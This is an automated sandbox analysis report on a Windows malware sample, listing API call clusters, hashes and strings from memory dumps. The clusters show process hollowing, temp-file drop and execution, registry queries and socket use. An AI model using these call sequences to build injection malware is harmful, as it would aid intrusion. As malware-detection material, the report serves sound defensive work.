                                                                                        • Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                        • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
                                                                                        • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
                                                                                        • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D$PromptOnSecureDesktop
                                                                                        • API String ID: 2981417381-1403908072
                                                                                        • Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                        • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                        • Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                        • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                        APIs
                                                                                        • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 026167C3
                                                                                        • htonl.WS2_32(?), ref: 026167DF
                                                                                        • htonl.WS2_32(?), ref: 026167EE
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 026168F1
                                                                                        • ExitProcess.KERNEL32 ref: 026169BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Processhtonl$CurrentExitHugeRead
                                                                                        • String ID: except_info$localcfg
                                                                                        • API String ID: 1150517154-3605449297
                                                                                        • Opcode ID: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                        • Instruction ID: fa2fbed1f141b604fdeb049cf41dfe97e2249f1c75f383c2a53dd4290d81e8d0
                                                                                        • Opcode Fuzzy Hash: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                        • Instruction Fuzzy Hash: 83616E71A40208AFDB609FB4DC45FEA77E9FB08300F14846AFA6DD2161EB75A990CF54
                                                                                        APIs
                                                                                        • htons.WS2_32(0261CC84), ref: 0261F5B4
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 0261F5CE
                                                                                        • closesocket.WS2_32(00000000), ref: 0261F5DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                        • Instruction ID: 13c5b6c110c3139388a58556ba17a7bdc44f22bec0933804ffe69d36ca4fd6ac
                                                                                        • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                        • Instruction Fuzzy Hash: 31316E72900218ABDB10DFA5DC89DEE7BBCFF89310F14456AF915D3150E770AA818BE4
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                        • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                        • wsprintfA.USER32 ref: 00407036
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                        • String ID: /%d$|
                                                                                        • API String ID: 676856371-4124749705
                                                                                        • Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                        • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                        • Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                        • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 02612FA1
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02612FB1
                                                                                        • GetProcAddress.KERNEL32(00000000,004103F0), ref: 02612FC8
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02613000
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02613007
                                                                                        • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 02613032
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: dnsapi.dll
                                                                                        • API String ID: 1242400761-3175542204
                                                                                        • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                        • Instruction ID: d85f8d14ae31e3e4dd18910e3748bb25aa5e6c16e927224d338220fcbb1b9b69
                                                                                        • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                        • Instruction Fuzzy Hash: 0921A171D40229BBCB219B54DC48AEEBBBCEF08B11F048461F906E7240D7B4AA9187E4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02617043), ref: 02616F4E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02616F55
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02616F7B
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02616F92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\kosqarwi
                                                                                        • API String ID: 1082366364-2846295348
                                                                                        • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                        • Instruction ID: 735d9eb027df61180605340d6988f01fcad2e846966826b4a2de34ad9a064fb7
                                                                                        • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                        • Instruction Fuzzy Hash: 452135617403803EF72257319C88FFB3E4D8F52765F1C80A9F804E6690DBD9A4D682AD
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3609698214-2980165447
                                                                                        • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                        • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?), ref: 026192E2
                                                                                        • wsprintfA.USER32 ref: 02619350
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02619375
                                                                                        • lstrlen.KERNEL32(?,?,00000000), ref: 02619389
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 02619394
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0261939B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2439722600-2980165447
                                                                                        • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction ID: 0b543809f75eb3f5a302b430a0b900b6df51f884b278a5b1d820f80f8e7e75af
                                                                                        • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction Fuzzy Hash: 051184B17402147FE7246731EC0DFEF3A6EDBC8B11F048069BF09E5090EEB59A418A68
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                        • wsprintfA.USER32 ref: 004090E9
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                        • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2439722600-2980165447
                                                                                        • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                        • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02619A18
                                                                                        • GetThreadContext.KERNEL32(?,?), ref: 02619A52
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 02619A60
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02619A98
                                                                                        • SetThreadContext.KERNEL32(?,00010002), ref: 02619AB5
                                                                                        • ResumeThread.KERNEL32(?), ref: 02619AC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2981417381-2746444292
                                                                                        • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                        • Instruction ID: 3adbf57ff7773a0d85b947bbd01f4eaeb2178b27659444ec678e88985656341b
                                                                                        • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                        • Instruction Fuzzy Hash: 44213BB1E02219BBDB119BA1DC09EEFBBBCEF04750F444061BA19E1190EB759A44CBA4
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(004102D8), ref: 02611C18
                                                                                        • LoadLibraryA.KERNEL32(004102C8), ref: 02611C26
                                                                                        • GetProcessHeap.KERNEL32 ref: 02611C84
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02611C9D
                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02611CC1
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000), ref: 02611D02
                                                                                        • FreeLibrary.KERNEL32(?), ref: 02611D0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID:
                                                                                        • API String ID: 2324436984-0
                                                                                        • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                        • Instruction ID: 937f823c50db36ea6593985e3d175f139a75537f352e49acd4e969e945d17785
                                                                                        • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                        • Instruction Fuzzy Hash: 0C315E31D00219FFCB119FA4DC889EEBAB9EB46305B2844BAE605E2250D7B55E80DB94
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                        • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1586453840-2980165447
                                                                                        • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                        • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
                                                                                        • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                        • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateEvent
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1371578007-2980165447
                                                                                        • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                        • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02616CE4
                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02616D22
                                                                                        • GetLastError.KERNEL32 ref: 02616DA7
                                                                                        • CloseHandle.KERNEL32(?), ref: 02616DB5
                                                                                        • GetLastError.KERNEL32 ref: 02616DD6
                                                                                        • DeleteFileA.KERNEL32(?), ref: 02616DE7
                                                                                        • GetLastError.KERNEL32 ref: 02616DFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                        • String ID:
                                                                                        • API String ID: 3873183294-0
                                                                                        • Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction ID: ba36685e482cad1246b4353134d0ebb92c6c1a860f3c4759a8b2e37aebd1b677
                                                                                        • Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction Fuzzy Hash: 8131237AD00249BFCB00DFA5DD44ADEBF7EEB48300F088069E611E32A0D770A6418B65
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 026193C6
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 026193CD
                                                                                        • CharToOemA.USER32(?,?), ref: 026193DB
                                                                                        • wsprintfA.USER32 ref: 02619410
                                                                                          • Part of subcall function 026192CB: GetTempPathA.KERNEL32(00000400,?), ref: 026192E2
                                                                                          • Part of subcall function 026192CB: wsprintfA.USER32 ref: 02619350
                                                                                          • Part of subcall function 026192CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02619375
                                                                                          • Part of subcall function 026192CB: lstrlen.KERNEL32(?,?,00000000), ref: 02619389
                                                                                          • Part of subcall function 026192CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 02619394
                                                                                          • Part of subcall function 026192CB: CloseHandle.KERNEL32(00000000), ref: 0261939B
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02619448
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3857584221-2980165447
                                                                                        • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction ID: 5069e02735c60c11ddbbc03bc3b0cf85e4853bdc38b1f235a7b1715badb1d0c6
                                                                                        • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction Fuzzy Hash: CD019EF69001187BDB20A7619D89EDF3B7CDB95701F0000A6BB09E2080EAB4A6C48F75
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                        • CharToOemA.USER32(?,?), ref: 00409174
                                                                                        • wsprintfA.USER32 ref: 004091A9
                                                                                          • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                          • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                          • Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                          • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                          • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                          • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3857584221-2980165447
                                                                                        • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                        • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: $localcfg
                                                                                        • API String ID: 1659193697-2018645984
                                                                                        • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                        • Instruction ID: d107bfa2c9435e27208d45145c514475e64629a4b5b2f9d21126432efe107cc9
                                                                                        • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                        • Instruction Fuzzy Hash: 3E713871E01344AADF218BD4DD85FEE376AAB01319F2C402AF904A62D0DF62BDC4CB59
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                          • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000), ref: 0040DDB5
                                                                                        • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                        • String ID: flags_upd$localcfg
                                                                                        • API String ID: 204374128-3505511081
                                                                                        • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                        • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                        • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                        • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                        APIs
                                                                                          • Part of subcall function 0261DF6C: GetCurrentThreadId.KERNEL32 ref: 0261DFBA
                                                                                        • lstrcmp.KERNEL32(00410178,00000000), ref: 0261E8FA
                                                                                        • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02616128), ref: 0261E950
                                                                                        • lstrcmp.KERNEL32(?,00000008), ref: 0261E989
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                        • String ID: A$ A$ A
                                                                                        • API String ID: 2920362961-1846390581
                                                                                        • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                        • Instruction ID: 69986b6fe92590b8cca1ea8a79acfb1d8b5975a1cfe0ed06719f8ed09025ef64
                                                                                        • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                        • Instruction Fuzzy Hash: 6331BC31A007459FCB75CF24C884BAA7BE8EB09725F08892AE99587654D372F880CB85
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID:
                                                                                        • API String ID: 3609698214-0
                                                                                        • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                        • Instruction ID: c3c250325527ba8b9ae982e3963c938b65232edce1e44862d4d2ecc46110ffcc
                                                                                        • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                        • Instruction Fuzzy Hash: BA216076108115FFDB149B70FC48EDF3FADDB49365B148525F502D1190EB71EA4096B8
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                        • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                        • Sleep.KERNEL32(00000000,?,75920F10,?,00000000,0040E538,?,75920F10,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                        • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3819781495-0
